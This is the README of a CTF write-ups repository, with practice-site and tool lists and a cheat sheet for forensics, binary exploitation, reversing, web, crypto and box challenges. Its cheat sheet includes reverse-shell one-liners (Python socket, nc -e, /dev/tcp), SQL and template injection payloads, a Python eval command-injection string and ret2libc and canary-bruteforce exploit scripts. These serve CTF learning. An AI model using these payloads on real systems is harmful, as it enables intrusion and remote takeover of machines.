/CTFWriteUps

Primary LanguagePython

CTFWriteUps

I will try organizing the challenges by difficulty and category in the README since I expect some people gonna use them as practice, however the difficulty I give it may be different than what you would expect. I will try to keep difficulty consistent throughout each category though.

Some categories here will also not match what is on the challenge solution README, that is because here I will put into the actual category while there I just put what the ctf said it was.

I've also included a list of CTF resources as well as a comprehensive cheat sheet covering tons of common CTF challenges.

Table of Contents

Resources

YouTube (We love video resources)

  • John Hammond
    • Used to make a lot of CTF videos, but has moved on to more malware rev stuff
    • Still a ton of useful videos. The CTF ones especially are amazing for teaching brand new baby cyber members how to do things. Highly highly recommend.
  • Live Overflow
  • IppSec
    • Best pwner on YouTube.
    • Makes writeups of every single HackTheBox machine
      • Talks about diff ways to solve and why things work. Highly recommend
  • Computerphile
    • Same people as Numberphile, but cooler. Makes really beginner-level and intuitive videos about basic concepts.
  • pwn.college
  • PwnFunction
    • Very high-quality and easy-to-understand animated videos about diff topics
    • Topics are a bit advanced, but easily understandable
  • Martin Carlisle
    • Princeton Grad - Cyber Professor - picoCTF problem writer - YouTuber - He's got it all!
    • Fr makes amazing writeup videos about the picoCTF challenges.
  • Sam Bowne
    • Absolutely amazing professor at the City College of San Francisco
    • Sponsor of one of the best CPTC teams in the country
    • Open sources all of his lectures and course material on his website
  • UFSIT
    • UF Cyber team (I'm a bit biased, but def one of the better YouTube channels for this)
  • Gynvael
    • Polish guy that competes on an amazing international CTF team
    • Makes amazingly intuitive video writeups. Has done the entirety of picoCTF 2019 (that's a lot)
  • stacksmashing
    • Amazing reverse engineering & hardware hacking videos
    • Has a really cool series of him reverse engineering WannaCry
  • Ben Greenberg
    • GMU prof with a bunch of pwn and malware video tutorials
    • A bit out-of-date, but still good
  • InfoSecLab at Georgia Tech
    • Good & advanced in-depth lectures on pwn
    • Requires some background knowledge
  • RPISEC
    • RPI University team meetings
    • Very advanced and assumes a bit of cs background knowledge

I've also collected some playlists of different topics

Pwn

Crypto

Web

Forensics

OSINT

x86 Assembly

CSAW writeups

Practice / Learning Sites

CTFs

  • PicoCTF
    • Tons of amazing practice challenges.
    • Definitely the gold standard for getting started
  • UCF
    • Good overall, but great pwn practice
    • I'm currently working on putting writeups here
  • hacker101
    • CTF, but slightly more geared toward pentesting
  • CSAW
    • Down 90% the time and usually none of the connections work
    • If it is up though, it has a lot of good introductory challenges
  • CTF101
    • One of the best intros to CTFs I've seen (gj osiris)
    • Very succinct and beginner-friendly

General

  • HackTheBox
    • The OG box site
      • Boxes are curated to ensure quality
    • Now has some CTF-style problems
    • Now has courses to start learning
  • TryHackMe
    • Slightly easier boxes than HackTheBox
    • Step-by-step challenges
    • Now has "learning paths" to guide you through topics
  • CybersecLabs
    • Great collection of boxes
    • Has some CTF stuff
  • VulnHub
    • Has vulnerable virtual machines you have to deploy yourself
    • Lots of variety, but hard to find good ones imo

Pwn

  • pwnable.kr
    • Challenges with good range of difficulty
  • pwnable.tw
    • Harder than pwnable.tw
    • Has writeups once you solve the chall
  • pwnable.xyz
    • More pwn challenges
    • Has writeups once you solve the chall
    • You can upload your own challenges once you solve all of them
  • pwn dojo
    • Best collection of pwn challenges in my opinion
    • Backed up with slides teaching how to do it & has a discord if you need help
  • nightmare
    • Gold standard for pwning C binaries
    • Has a few mistakes/typos, but amazing overall
  • pwn notes
    • Notes from some random person online
    • Very surface-level, but good intro to everything
  • Security Summer School
    • University of Bucharest Security Course
    • Very beginner-friendly explanations
  • RPISEC MBE
    • RPI's Modern Binary Exploitation Course
    • Has a good amount of labs/projects for practice & some (slightly dated) lectures
  • how2heap
    • Heap Exploitation series made by ASU's CTF team
    • Includes a very cool debugger feature to show how the exploits work
  • ROPEmporium
    • Set of challenges in every major architecture teaching Return-Oriented-Programming
    • Very high quality. Teaches the most basic to the most advanced techniques.
    • I'm currently adding my own writeups here

Rev

Web

  • websec.fr
    • Lots of web challenges with a good range of difficulty
  • webhacking.kr
    • Has archive of lots of good web challenges
  • Securing Web Applications
    • Open source CCSF Course
  • OWASP Juice Shop
    • Very much geared toward pentesting, but useful for exploring web in CTFs
    • Over 100 vulns/challenges in total
  • PortSwigger
    • Gold standard for understanding web hacking
    • Tons of amazing challenges & explanations
  • DVWA
    • Very much geared toward pentesting, but useful for exploring web in CTFs
  • bWAPP
    • Very much geared toward pentesting, but useful for exploring web in CTFs
  • CTF Challenge
    • Collection of web challenges made by Adam Langley that are made to be as realistic as possible.
    • Good for getting bug bounty experience

Crypto

Smart Contracts

Pentesting

Practice Problems for Self Learning

Level 1 - Intro

Introductory CTFs to get your feet wet

Level 2 - Tooling

More introductory CTFs

Level 3 - Crypto & Hashes with CTF practice

Level 4 - Web

Level 5 - Reverse Engineering

Level 6 - PrivEsc

Level 7 - CTF practice

Tools for Solving CTF Challenges

Attacks

Tools used for performing various kinds of attacks

  • Bettercap - Framework to perform MITM (Man in the Middle) attacks.
  • Yersinia - Attack various protocols on layer 2.

Crypto

Tools used for solving Crypto challenges

  • CyberChef - Web app for analysing and decoding data.
  • Cryptii - Web app offering modular conversion, encoding and encryption online.
  • FeatherDuster - An automated, modular cryptanalysis tool.
  • Hash Extender - A utility tool for performing hash length extension attacks.
  • padding-oracle-attacker - A CLI tool to execute padding oracle attacks.
  • PkCrack - A tool for Breaking PkZip-encryption.
  • QuipQuip - An online tool for breaking substitution ciphers or vigenere ciphers (without key).
  • RSACTFTool - A tool for recovering RSA private key with various attack.
  • RSATool - Generate private key with knowledge of p and q.
  • XORTool - A tool to analyze multi-byte xor cipher.

Bruteforcers

Tools used for various kind of bruteforcing (passwords etc.)

  • Hashcat - Password Cracker
  • Hydra - A parallelized login cracker which supports numerous protocols to attack
  • John The Jumbo - Community enhanced version of John the Ripper.
  • John The Ripper - Password Cracker.
  • Nozzlr - Nozzlr is a bruteforce framework, trully modular and script-friendly.
  • Ophcrack - Windows password cracker based on rainbow tables.
  • Patator - Patator is a multi-purpose brute-forcer, with a modular design.
  • Turbo Intruder - Burp Suite extension for sending large numbers of HTTP requests

Esoteric Languages

  • Brainfuck - Brainfuck esoteric programming language IDE.
  • COW - It is a Brainfuck variant designed humorously with Bovinae in mind.
  • Malbolge - Malbolge esoteric programming language solver.
  • Ook! - Tool for decoding / encoding in Ook!
  • Piet - Piet programming language compiler.
  • Rockstar - A language intended to look like song lyrics.
  • Try It Online - An online tool that has a ton of Esoteric language interpreters.

Exploits

Tools used for solving Exploits challenges

  • afl - Security-oriented fuzzer.
  • DLLInjector - Inject dlls in processes.
  • honggfuzz - Security oriented software fuzzer. Supports evolutionary, feedback-driven fuzzing based on code coverage.
  • libformatstr - Simplify format string exploitation.
  • Metasploit - Penetration testing software.
  • one_gadget - A tool to find the one gadget execve('/bin/sh', NULL, NULL) call.
    • gem install one_gadget
  • Pwntools - CTF Framework for writing exploits.
  • Qira - QEMU Interactive Runtime Analyser.
  • ROP Gadget - Framework for ROP exploitation.
  • Ropper - Display information about files in different file formats and find gadgets to build rop chains for different architectures.
  • Shellcodes Database - A massive shellcodes database.
  • V0lt - Security CTF Toolkit.

Forensics

Tools used for solving Forensics challenges

  • Autopsy - End-to-end open source digital forensics platform.
  • Aircrack-Ng - Crack 802.11 WEP and WPA-PSK keys.
    • apt-get install aircrack-ng
  • Audacity - Analyze sound files (mp3, m4a, whatever).
    • apt-get install audacity
  • Binwalk - Firmware Analysis Tool.
  • Bkhive and Samdump2 - Dump SYSTEM and SAM files.
    • apt-get install samdump2 bkhive
  • Bulk-extractor - High-performance digital forensics exploitation tool.
  • CFF Explorer - PE Editor.
  • ChromeCacheView - Small utility that reads the cache folder of Google Chrome Web browser, and displays the list of all files currently stored in the cache.
  • Creddump - Dump windows credentials.
  • DVCS Ripper - Rips web accessible (distributed) version control systems.
  • Exif Tool - Read, write and edit file metadata.
  • Extundelete - Used for recovering lost data from mountable images.
  • Fibratus - Tool for exploration and tracing of the Windows kernel.
  • firmware-mod-kit - Modify firmware images without recompiling.
  • Foremost - Extract particular kind of files using headers.
    • apt-get install foremost
  • Fsck.ext4 - Used to fix corrupt filesystems.
  • Malzilla - Malware hunting tool.
  • MZCacheView - Small utility that reads the cache folder of Firefox/Mozilla/Netscape Web browsers, and displays the list of all files currently stored in the cache.
  • NetworkMiner - Network Forensic Analysis Tool.
  • PDF Streams Inflater - Find and extract zlib files compressed in PDF files.
  • Pngcheck - Verifies the integrity of PNG and dump all of the chunk-level information in human-readable form.
    • apt-get install pngcheck
  • ResourcesExtract - Extract various filetypes from exes.
  • Shellbags - Investigate NT_USER.dat files.
  • Snow - A Whitespace Steganography Tool.
  • USBRip - Simple CLI forensics tool for tracking USB device artifacts (history of USB events) on GNU/Linux.
  • Volatility - To investigate memory dumps.
  • Wireshark - Used to analyze pcap or pcapng files
  • X-Ways - Advanced work environment for computer forensic examiners.

Registry Viewers

  • OfflineRegistryView - Simple tool for Windows that allows you to read offline Registry files from external drive and view the desired Registry key in .reg file format.
  • Registry Viewer® - Used to view Windows registries.

Networking

Tools used for solving Networking challenges

  • Masscan - Mass IP port scanner, TCP port scanner.
  • Monit - A linux tool to check a host on the network (and other non-network activities).
  • Nipe - Nipe is a script to make Tor Network your default gateway.
  • Nmap - An open source utility for network discovery and security auditing.
  • Wireshark - Analyze the network dumps.
    • apt-get install wireshark
  • Zeek - An open-source network security monitor.
  • Zmap - An open-source network scanner.

Reversing

Tools used for solving Reversing challenges

  • Androguard - Reverse engineer Android applications.
  • Angr - platform-agnostic binary analysis framework.
  • Apk2Gold - Yet another Android decompiler.
  • ApkTool - Android Decompiler.
  • Barf - Binary Analysis and Reverse engineering Framework.
  • Binary Ninja - Binary analysis framework.
  • BinUtils - Collection of binary tools.
  • BinWalk - Analyze, reverse engineer, and extract firmware images.
  • Boomerang - Decompile x86/SPARC/PowerPC/ST-20 binaries to C.
  • ctf_import – run basic functions from stripped binaries cross platform.
  • cwe_checker - cwe_checker finds vulnerable patterns in binary executables.
  • demovfuscator - A work-in-progress deobfuscator for movfuscated binaries.
  • Frida - Dynamic Code Injection.
  • GDB - The GNU project debugger.
  • GEF - GDB plugin.
  • Ghidra - Open Source suite of reverse engineering tools. Similar to IDA Pro.
  • Hopper - Reverse engineering tool (disassembler) for OSX and Linux.
  • IDA Pro - Most used Reversing software.
  • Jadx - Decompile Android files.
  • Java Decompilers - An online decompiler for Java and Android APKs.
  • Krakatau - Java decompiler and disassembler.
  • Objection - Runtime Mobile Exploration.
  • PEDA - GDB plugin (only python2.7).
  • Pin - A dynamic binary instrumentaion tool by Intel.
  • PINCE - GDB front-end/reverse engineering tool, focused on game-hacking and automation.
  • PinCTF - A tool which uses intel pin for Side Channel Analysis.
  • Plasma - An interactive disassembler for x86/ARM/MIPS which can generate indented pseudo-code with colored syntax.
  • Pwndbg - A GDB plugin that provides a suite of utilities to hack around GDB easily.
  • radare2 - A portable reversing framework.
  • Triton - Dynamic Binary Analysis (DBA) framework.
  • Uncompyle - Decompile Python 2.7 binaries (.pyc).
  • WinDbg - Windows debugger distributed by Microsoft.
  • Xocopy - Program that can copy executables with execute, but no read permission.
  • Z3 - A theorem prover from Microsoft Research.

JavaScript Deobfuscators

  • Detox - A Javascript malware analysis tool.
  • Revelo - Analyze obfuscated Javascript code.

SWF Analyzers

  • RABCDAsm - Collection of utilities including an ActionScript 3 assembler/disassembler.
  • Swftools - Collection of utilities to work with SWF files.
  • Xxxswf - A Python script for analyzing Flash files.

Services

Various kind of useful services available around the internet

  • CSWSH - Cross-Site WebSocket Hijacking Tester.
  • Request Bin - Lets you inspect http requests to a particular url.

Steganography

Tools used for solving Steganography challenges

  • AperiSolve - Aperi'Solve is a platform which performs layer analysis on image (open-source).
  • BPStegano - Python3 based LSB steganography.
  • Convert - Convert images b/w formats and apply filters.
  • DTMF Tones - Audio frequencies common to a phone button.
  • Exif - Shows EXIF information in JPEG files.
  • Exiftool - Read and write meta information in files.
  • Exiv2 - Image metadata manipulation tool.
  • hipshot - Tool to converts a video file or series of photographs into a single image simulating a long-exposure photograph.
  • Image Steganography - Embeds text and files in images with optional encryption. Easy-to-use UI.
  • Image Steganography Online - This is a client-side Javascript tool to steganographically hide images inside the lower "bits" of other images
  • ImageMagick - Tool for manipulating images.
  • Outguess - Universal steganographic tool.
  • Pngcheck - Verifies the integrity of PNG and dump all of the chunk-level information in human-readable form.
  • Pngtools - For various analysis related to PNGs.
    • apt-get install pngtools
  • SmartDeblur - Used to deblur and fix defocused images.
  • Snow - Whitespace Steganography Tool
  • Sonic Visualizer - Audio file visualization.
  • Steganabara - Tool for stegano analysis written in Java.
  • Steganography Online - Online steganography encoder and decoder.
  • Stegbreak - Launches brute-force dictionary attacks on JPG image.
  • StegCracker - Steganography brute-force utility to uncover hidden data inside files.
  • stegextract - Detect hidden files and text in images.
  • Steghide - Hide data in various kind of images.
  • StegOnline - Conduct a wide range of image steganography operations, such as concealing/revealing files hidden within bits (open-source).
  • Stegosaurus - A steganography tool for embedding payloads within Python bytecode.
  • StegoVeritas - Yet another stego tool.
  • Stegseek - Lightning fast steghide cracker that can be used to extract hidden data from files.
  • Stegsnow - Whitespace steganography program.
  • Stegsolve - Apply various steganography techniques to images.
  • Zsteg - PNG/BMP analysis.

Web

Tools used for solving Web challenges

  • BurpSuite - A graphical tool to testing website security.
  • Commix - Automated All-in-One OS Command Injection and Exploitation Tool.
  • Hackbar - Firefox addon for easy web exploitation.
  • OWASP ZAP - Intercepting proxy to replay, debug, and fuzz HTTP requests and responses
  • Postman - Add on for chrome for debugging network requests.
  • Raccoon - A high performance offensive security tool for reconnaissance and vulnerability scanning.
  • SQLMap - Automatic SQL injection and database takeover tool. pip install sqlmap
  • W3af - Web Application Attack and Audit Framework.
  • XSSer - Automated XSS testor.

CTF Cheat Sheet

Forensics / Steganography

General

  • Really good resource from John Hammond for different types of challenges:
  • Another very great cheat sheet for creating and solving challenges:
  • file
    • file <file.xyz>
    • Determines the type of file
  • steghide
    • steghide extract -sf <file.xyz>
    • Extracts embedded files
  • stegseek
    • stegseek <file> <password list>
    • Extracts embedded files using a wordlist
    • super super quick
  • binwalk
    • binwalk -M --dd=".*" <file.xyz>
    • Extracts embedded files
  • exiftool
    • exiftool <file.xyz>
    • Reads metadata
  • strings
    • strings <file.xyz>
    • Finds all printable characters in a file
  • hexedit
  • Ghex (another hex editor but with GUI. Good if you need to jump to a certain byte)
    • ghex <file.xyz>
  • docx files are containers so you can unzip them to find hidden content
    • unzip <file.docx>
  • Grep | A good way to use grep to find the flag recursively:
    • grep -r --text 'picoCTF{.*}'
    • egrep -r --text 'picoCTF{.*?}
    • You can change 'picoCTF' to the beginning of the flag you are looking for
  • Ltrace | Allows you to see what the code is doing as you run the program:
    • ltrace ./<file>
    • ltrace -s 100 ./<file>
      • Ltrace shortens very long strings. You can use -s to increase how many characters ltrace shows. Good for when looking at strcmp that have large strings.

Audio

Image

  • stegsolve

    • Switch through bits

  • foremost

    • Special tool for extracting images
    • Can be used to put together broken images (in pcap for example)

  • Depix

    • Unpixelate text

  • Check if something was photoshopped (look at highlights)

  • zsteg

    • LSB decoder

  • jsteg

    • jpeg steganography solver

  • pixrecovery

    • so far the most effective png recovery tool i've found (as long as you don't care about watermarks)
    • photopea also works very well

  • crc32fix

    • fix height and width of png based on checksum

  • PCRT

    • fix png header and footer info

  • png-crc-fix

    • fix png checksum

  • pngcheck

    • find out if there are errors in the png
    • pngcheck

Video

Machine Image

  • Recovering files
    • photorec <file.bin>
  • You can mount an image as a virtual machine
  • Mount a .img file:
    • binwalk -M --dd=".*" <fileName>
    • run file on output and select the Linux filesystem file
    • losetup /dev/loop<freeLoopNumber> <fileSystemFile>

Pcap

  • Extract data with tcpflow
    • tcpflow -r <file.pcap>
  • Extract data with wireshark
    • File → Export Objects → Make selection

Pwn / Binary Exploitation

  • For this one, I suggest looking at my LearnPwn repo instead, as this cheatsheet was made before I knew much about pwn
    • However, I have included some notes amending to what I have here.

General

  • check security of ELF
    • checksec <binary>
    • rabin2 -I <binary>
  • look at symbols
    • readelf -s <binary>
  • look at strings
    • rabin2 -z <binary>
  • pack address to byte
    • little endian (for 32 bits)
      • python -c "import pwn; print(pwn.p32(<intAddr>))
    • big endian (for 64 bits)
      • python -c "import pwn; print(pwn.p64(<intAddr>))
    • pwntools automatically packs addresses with the correct endianness for you

Buffer overflow

  • If you ever need to get a /bin/sh shell and you are sure it works but the program exits anyways, use this trick:
    • ( python -c "print '<PAYLOAD>'" ; cat ) | ./<program>
    • pwntools does this with its process.interactive()

PIE (Positional Independent Execution)

  • determine random value
    • pwn cyclic <numChars> to generate payload
    • dmesg | tail | grep segfault to see where error was
    • pwn cyclic -l 0x<errorLocation> to see random offset to control instruction pointer
    • example

NX (Non-executable)

  • We can use ROP (return oriented programming) to solve

ROP (for statically compiled binaries)

  • ROPGadget
    • view gadgets & automatically generate ropchains
    • ROPgadget --ropchain --binary <binary>
      • You can then add padding at the start of the code (based on the difference between your buffer and return address) and run the code to get a shell
      • Demo
  • ropr

Stack Canary

Finding the stack canary in a debugger

  • Stack canary is a value placed before the EIP/RIP (instruction pointer) that can overwritten by a buffer overflow. The program causes an error basically if the stack is overwritten to something different than it originally was. Our goal is to find the original stack so when we overflow, the program runs normally.
  • The stack canary is taken from gs, or fs (for 32 and 64 bit respectively)
    • In the disassembly, before something is read, you can see a line similar to the following:
   0x000000000000121a <+4>: sub    rsp,0x30
   0x000000000000121e <+8>: mov    rax,QWORD PTR fs:0x28
   0x0000000000001227 <+17>:mov    QWORD PTR [rbp-0x8],rax
   0x000000000000122b <+21>:xor    eax,eax
  • Here, the stack canary is moved into rax at offset +8.
    • Thus, break at the next offset and check what's in rax (i r rax) to see what the current canary is

Static Canaries

  • A canary is only static if it was manually implemented by the programmer (which is the case in some intro pwn challenges), or if you are able to fork the program.
    • When you fork the binary, the forked one has the same canary, so you can do a byte-by-byte bruteforce on that

Extra

  • When a stack canary is improperly overwritten, it will cause a call to __stack_chk_fail

    • If we can't leak the canary, we can also modify the GOT table to prevent it from being called

  • The canary is stored in the TLS structure of the current stack and is initialized by security_init

    • If you can overwrite the real canary value, you can set it equal whatever you decide to overflow.

  • Simple script to bruteforce a static 4 byte canary:

#!/bin/python3
from pwn import *

#This program is the buffer_overflow_3 in picoCTF 2018
elf = ELF('./vuln')

# Note that it's probably better to use the chr() function too to get special characters and other symbols and letters.
# But this canary was pretty simple :)
alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"

canary = ''
# Here we are bruteforcing a canary 4 bytes long
for i in range(1,5):
	for letter in range(0,len(alphabet)):  # We will go through each letter/number in the string 'alphabet'
		p = elf.process()  # We start the process
		wait = p.recv().decode('utf-8')
		p.sendline(str(32+i))  # In this program, we had to specify how many bytes we were gonna send.
		wait = p.recv().decode('utf-8')
		p.sendline('A'*32 + canary + alphabet[letter])  # We send the 32 A's to overflow, and then the canary we already have + our guess
		prompt = p.recv().decode('utf-8')
		if "Stack" not in prompt:  # The program prints "Stack smashed [...]" if we get wrongfully write the canary.
			canary += alphabet[letter]  # If it doesn't print that, we got part of our canary :)
			break  # Move on to the next canary letter/number

print("The canary is: " + canary)

Format String Vulnerabilities

  • Look at Table 2 for what to try if you see "printf(buf)" or something like that:
  • Highly recommend looking at John Hammond doing 'echooo' challenge from picoCTF 2018
  • Sometimes, trying to print only strings from the stack like this: '%s %s %s %s %s %s' may cause errors since not everything in the stack is a string.
  • Try to minimize that by doing '%x %x %x %x %x %s' instead
  • Instead of having to constantly increase how many %x and %s you type, you can pass a parameter to make it easier:
    • %1$s | This will print the first value in the stack (from what I understand, the one right next to your buffer) as a string.
    • %2$s | This will print the 2nd value as a string, and you get the idea
    • You can use one-liner loops to try to find the flag by leaking the stack. Press ^C (CTRL + C) to go to the next value.
      • for i in {1..100}; do echo "%$i\$s" | nc [b7dca240cf1fbf61.247ctf.com](http://b7dca240cf1fbf61.247ctf.com/) 50478; done
  • You can control how much you leak using different size parameters:
    • %hhx leaks 1 byte (half of half of int size)
    • %hx leaks 2 bytes (half of int size)
    • %x leaks 4 bytes (int size)
    • %lx leaks 8 bytes (long size)
  • very good video on modifying the stack with fstring vuln and %n:

Shellcode

Return-to-Libc

  • We will overwrite the EIP to call the system() library function and we will also pass what it should execute, in this example a buffer with "/bin/sh"

  • Good explanation:

  • Good example (go to 3:22:44):

  • Get address for execve("/bin/sh")

    • one_gadget <libc file>

  • If you already know the libc file and a location (ie. dont have to leak them...)

    #!/bin/python3

from pwn import *
import os

binaryName = 'ret2libc1'

# get the address of libc file with ldd
libc_loc = os.popen(f'ldd {binaryName}').read().split('\n')[1].strip().split()[2]

# use one_gadget to see where execve is in that libc file
one_gadget_libc_execve_out = [int(i.split()[0], 16) for i in os.popen(f'one_gadget {libc_loc}').read().split("\n") if "execve" in i]

# pick one of the suitable addresses
libc_execve_address = one_gadget_libc_execve_out[1]

p = process(f'./{binaryName}')
e = ELF(f'./{binaryName}')
l = ELF(libc_loc)

# get the address of printf from the binary output
printf_loc = int(p.recvuntil('\n').rstrip(), 16)

# get the address of printf from libc
printf_libc = l.sym['printf']

# calculate the base address of libc
libc_base_address = printf_loc - printf_libc

# generate payload

# 0x17 is from gdb analysis of offset from input to return address
offset = 0x17

payload = b"A"*offset
payload += p64(libc_base_address + libc_execve_address)

# send the payload
p.sendline(payload)

# enter in interactive so we can use the shell created from our execve payload
p.interactive()

Reverse Engineering

Cool Guide: https://opensource.com/article/20/4/linux-binary-analysis

  • Ghidra
    • Very useful decompiler
  • dotPeek or dnSpy
    • decompile .NET executables
  • jadx and jadx-gui
    • decompile apks
  • devtoolzone
    • decompile java online
  • apktool
    • decompile apks
    • apktool d *.apk
  • gdb
    • Binary analysis
    • peda (extension for increased functionality)
    • gef (gdb extension for pwners)
  • radare2
    • Binary analysis

SMT Solvers

Reversing byte-by-byte checks (side-channel attack)

https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html

  • Here's a version I made for a challenge that uses a time-based attack:
    • You might have to run it a couple times just to account for randomness
#!/bin/python3

from pwn import *
import string

keyLen = 8
binaryName = 'binary'

context.log_level = 'error'

s = ''
print("*"*keyLen)
for chars in range(keyLen):
    a = []
    for i in string.printable:
        p = process(f'perf stat -x, -e cpu-clock ./{binaryName}'.split())
        p.readline()
        currPass = s + i + '0'*(keyLen - chars - 1)
        # print(currPass)
        p.sendline(currPass.encode())
        p.readline()
        p.readline()
        p.readline()
        info = p.readall().split(b',')[0]
        p.close()
        try:
            a.append((float(info), i))
        except:
            pass
        # print(float(info), i)
    a.sort(key = lambda x: x[0])
    s += str(a[-1][1])
    print(s + "*"*(keyLen - len(s)))
    # print(sorted(a, key = lambda x: x[0]))

p = process(f'./{binaryName}')
p.sendline(s.encode())
p.interactive()

Searching strings with gef

  • If your flag is being read into a variable or register at any point, you can break after it is moved and run grep <string> and gef will automatically show you the string that matches your search pattern

Web

  • Nikto (if allowed)
    • automatically looks for vulnerabilities
  • gobuster (if allowed)
    • Brute forces directories and files
  • hydra (if allowed)
    • Brute forces logins for various services
  • BurpSuite
    • Intercepts web requests and allows you to modify them
  • Wireshark
    • Analyze live network traffic and pcap files
  • php reverse shell
    • Useful for websites that allow you to upload files
    • This file needs to be executed on the server to work
  • jwt
    • You can identify a JWT token since it begins with "ey"
    • This site will decode JSON web tokens
    • You can crack the secret for the JSON web token to modify and sign your own tokens
      • echo <token> > jwt.txt
      • john jwt.txt
  • SQL injection
    • sqlmap
      • sqlmap --forms --dump-all -u <url>
      • Automates the process of SQL injection
    • Basic SQL injection
      • Enter 'OR 1=1-- in login form
      • On the server this will evaluate to SELECT * FROM Users WHERE User = '' OR 1=1--' AND Pass = ''
      • 1=1 evaluates to true, which satisfies the OR statement, and the rest of the query is commented out by the --
  • PayloadsAllTheThings
    • Great resource for web exploitation with lots of payloads
  • Template Injection
    • tplmap
      • Automated server-side template injection
    • Jinja Injection
      • {{ config.items() }}
    • Flask Injection
      • {{config}}
    • Python eval() function
      • __import__.('subprocess').getoutput('<command>')
        • make sure to switch the parentheses if it doesn't work
      • __import__.('subprocess').getoutput('ls').split('\\n')
        • list files in system
    • More python injection
  • Cross Site Scripting

Fuzzing input fields

  • FFUF
    • Copy the request to the input field and replace the parameter with "FUZZ":
      • ffuf -request input.req -request-proto http -w /usr/share/seclists/Fuzzing/special-chars.txt -mc all
      • Use -fs to filter sizes

Crypto

CyberChef

  • CyberChef
    • Carries out various cryptography operations

Cipher Detector!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Common Ciphers

  • Caesars Cipher

  • Vigenere Cipher

    #### Solver using custom table
cipherText = ""
plainText = ""
flagCipherText = ""
tableFile = ""

with open(cipherText) as fin:
    cipher = fin.readline().rstrip()

with open(plainText) as fin:
    plain = fin.readline().rstrip()

with open(flagCipherText) as fin:
    flag = fin.readline().rstrip()

with open(tableFile) as fin:
    table = [i.rstrip().split() for i in fin.readlines()]

table[0].insert(0, "") # might have to modify this part.
			# just a 2d array with the lookup table
			# should still work if the table is slightly off, but the key will be wrong
key = ""
for i, c in enumerate(plain[0:100]):
  col = table[0].index(c)
  for row in range(len(table)):
    if table[row][col] == cipher[i]:
      key += table[row][0]
      break

print(key)

dec_flag = ""
for i, c in enumerate(flag[:-1]):
  col = table[0].index(key[i])
  for row in range(len(table)):
    if table[row][col] == flag[i]:
      dec_flag += table[row][0]
      break

print(dec_flag)

  • Substitution Cipher

  • Rot13

  • Keyed Caesars cipher

RSA

Grab RSA Info with pycryptodome

from Crypto.PublicKey import RSA

keyName = "example.pem"

with open(keyName,'r') as f:
	key = RSA.import_key(f.read())

print(key)

# You can also get individual parts of the RSA key 
# (sometimes not all of these)
print(key.p)
print(key.q)
print(key.n)
print(key.e)
print(key.d)
print(key.u)

# public keys have n and e

Chinese Remainder Theorem (p,q,e,c)

  • Use this when you can factor the number n

    • Bad implementations will have more than one prime factor
    • Proof

  • Old

    def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    g, y, x = egcd(b%a,a)
    return (g, x - (b//a) * y, y)

def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception('No modular inverse')
    return x%m

p = 
q = 
e = 
c = 

n = p*q # use factordb command or website to find factors

phi = (p-1)*(q-1) # phi is simply the product of (factor_1-1) * ... * (factor_n -1)

d = modinv(e, phi) # private key

# print(d)

m = pow(c,d,n) # decrypted plaintext message in long integer form

thing = hex(m)[2:] # ascii without extra stuff at the start (0x)
print(bytes.fromhex(thing).decode('ascii'))

  • New

    #!/bin/python3
from Crypto.Util.number import *
from factordb.factordb import FactorDB

# ints:
n =    
e =  
c =  

f = FactorDB(n)
f.connect()
factors = f.get_factor_list()

phi = 1
for i in factors:
	phi *= (i-1)

d = inverse(e, phi)
m = pow(c, d, n)

flag = long_to_bytes(m).decode('UTF-8')
print(flag)

  • Website that gives factors and euler's totient (phi)

Coppersmith attack (c,e)

  • Usually used if the exponent is very small (e <= 5) 
from Crypto.Util.number import *
def nth_root(radicand, index):
    lo = 1
    hi = radicand
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if mid ** index > radicand:
            hi = mid
        else:
            lo = mid

    if lo ** index == radicand:
        return lo
    elif hi ** index == radicand:
        return hi
    else:
        return -1

c = 
e = 

plaintext = long_to_bytes(nth_root(c, e))
print(plaintext.decode("UTF-8"))

Pollards attack (n,e,c)

from Crypto.Util.number import *
from math import gcd

n = 
c = 
e = 

def pollard(n):
    a = 2
    b = 2
    while True:
        a = pow(a,b,n)
        d = gcd(a-1,n)
        if 1 < d < n: 
            return d
        b += 1

p = pollard(n)
q = n // p

phi = 1
for i in [p,q]:
    phi *= (i-1)

d = inverse(e, phi)
m = pow(c, d, n)

flag = long_to_bytes(m).decode('UTF-8')
print(flag)

Wiener Attack (n,e,c)

  • For use when d is too small (or e is too big) 
from Crypto.Util.number import *
import owiener

n = 
e = 
c = 

d = owiener.attack(e, n)
m = pow(c, d, n)

flag = long_to_bytes(m)
print(flag)

Base16, 32, 36, 58, 64, 85, 91, 92

https://github.com/mufeedvh/basecrack

Box

Connecting

  • ssh
    • ssh <username>@<ip>
    • ssh <username>@<ip> -i <private key file>
    • Mount SSH in as a file system locally:
      • sshfs -p <port> <user>@<ip>: <mount_directory>
    • Known hosts
      • ssh-copy-id -i ~/.ssh/id_rsa.pub <user@host>
  • netcat
    • nc <ip> <port>

Enumeration

  • Machine discovery

    • netdiscover

  • Machine port scanning

    • nmap -sC -sV <ip>

  • Linux enumeration

    • enum4linux <ip>

  • SMB enumeration

    • smbmap -H <ip>

  • Connect to SMB share

    • smbclient //<ip>/<share>

Privilege escalation

  • linpeas
    • ./linpeas.sh
    • Automatically looks for privilege escalation vectors
  • List commands we can run as root
    • sudo -l
  • Find files with the SUID permission
    • find / -perm -u=s -type f 2>/dev/null
    • These files execute with the privileges of the owner instead of the user executing them

Listen for reverse shell

  • nc -lnvp <port>

Reverse shell

  • revshells.com
    • templates for basically everything you might need
  • python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • nc -e /bin/sh <ip> <port>
  • bash -i >& /dev/tcp/<ip>/<port> 0>&1

Get interactive shell

Linux

  1. Run the following python command to make it partially interactive: python -c 'import pty;pty.spawn("/bin/bash");'
  2. Exit the netcat session with CTRL+Z and run stty raw -echo locally
  3. Reenter your session with the command fg (and the job id afterward if needed)
  4. Change your terminal emulator to xterm by running export TERM=xterm (this might not be necessary)
  5. Change your shell to bash by running export SHELL=bash (this might not be necessary)
  6. Done! Now your shell should be fully interactive

